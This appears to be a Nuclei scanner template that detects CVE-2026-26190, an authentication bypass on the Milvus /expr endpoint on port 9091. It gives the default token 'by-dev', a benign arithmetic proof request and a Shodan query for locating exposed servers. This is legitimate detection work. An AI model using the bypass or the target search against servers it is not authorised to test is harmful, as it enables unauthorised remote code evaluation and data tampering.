id: CVE-2026-26190 info: name: Milvus - Unauthenticated Metrics API Access author: WRG-11 severity: critical description: | Milvus < 2.5.27 and < 2.6.10 contains an authentication bypass caused by weak default token and unauthenticated REST API on TCP port 9091, letting attackers perform arbitrary expression evaluation and data manipulation, exploit requires network access to port 9091. impact: | Attackers can bypass authentication to execute arbitrary expressions and manipulate data, risking full system compromise. remediation: | Update to versions 2.5.27 or 2.6.10 or later. reference: - https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6 - https://github.com/advisories/GHSA-7ppg-37fh-vcr6 - https://nvd.nist.gov/vuln/detail/CVE-2026-26190 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-26190 epss-score: 0.36912 epss-percentile: 0.98348 cwe-id: CWE-306 metadata: verified: true max-request: 2 vendor: milvus product: milvus shodan-query: 'http.html:"404 page not found" port:"9091"' tags: cve,cve2026,milvus,auth-bypass,unauth variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" result: "{{to_number(num1)*to_number(num2)}}" flow: http(1) && http(2) http: - raw: - | GET /expr?auth={{randstr}}&code={{num1}}*{{num2}} HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - 'the expr auth is invalid' internal: true - raw: - | GET /expr?auth=by-dev&code={{num1}}*{{num2}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '"output":"{{result}}"' - type: status status: - 200 # digest: 490a00463044022001cea9fbbb8f8ee50327d25f9464dcdfe4a0c2e5409fd30422119cdd04fb701502205948b633d59cd9d2a87997ded888e98f4cc8e957b8ddaf38b7d13adc2b3317ad:922c64590222798bb761d5b6d8e72950